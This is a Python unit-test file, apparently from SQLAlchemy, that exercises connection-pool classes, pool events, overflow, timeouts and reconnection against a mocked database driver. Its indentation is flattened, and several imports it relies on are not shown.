import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises, is_not_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock, call
join_timeout = 10
def MockDBAPI():
def cursor():
while True:
yield Mock()
def connect():
while True:
yield Mock(cursor=Mock(side_effect=cursor()))
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect())
db = Mock(connect=Mock(side_effect=connect()),
shutdown=shutdown, _shutdown=False)
return db
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
**kw)
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
dbapi = MockDBAPI()
manager = pool.manage(dbapi, use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
eq_(dbapi.connect.mock_calls,
[
call("foo.db"),
call("foo.db"),
]
)
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
is_not_(c.connection, c2.connection)
assert not c2.info
assert 'foo2' in c.info
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print('Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup)
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError:
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
def creator():
time.sleep(.05)
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
time.sleep(2)
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(
target=run_test, args=("success_one", p, False)),
threading.Thread(
target=run_test, args=("success_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_one", p, True)),
threading.Thread(
target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False))
]
for t in threads:
t.start()
time.sleep(.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[call("success_one"), call("success_two"),
call("overflow_two"), call("overflow_three"),
call("overflow_one")]
)
@testing.requires.threading_with_mock
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
mutex.acquire()
try:
return dbapi.connect()
finally:
mutex.release()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(.1)
conn.close()
c1 = p.connect()
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(target=waiter,
args=(p, timeout, max_overflow))
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(.2)
p2 = p._replace()
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
@testing.requires.threading_with_mock
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator1():
canary.append(1)
return dbapi.connect()
def creator2():
canary.append(2)
return dbapi.connect()
p1 = pool.QueuePool(creator=creator1,
pool_size=1, timeout=None,
max_overflow=0)
p2 = pool.NullPool(creator=creator2)
def waiter(p):
conn = p.connect()
time.sleep(.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.start()
threads.append(t)
time.sleep(.5)
eq_(canary, [1])
p1._pool.abort(p2)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=dbapi.connect,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
pool._refs.clear()
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0])
)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter. i.e. its not true
reference counting."""
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = self._queuepool_fixture(pool_size=1,
max_overflow=0,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises(
Exception,
p.connect
)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = p.connect()
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = p.connect()
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = p.connect()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1,
max_overflow=2, recycle=1)
c1 = p.connect()
c1.close()
time.sleep(1)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1, max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect()
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
@testing.requires.threading_with_mock
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect()
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls([
call('foo.db'),
call('foo.db')],
any_order=True)
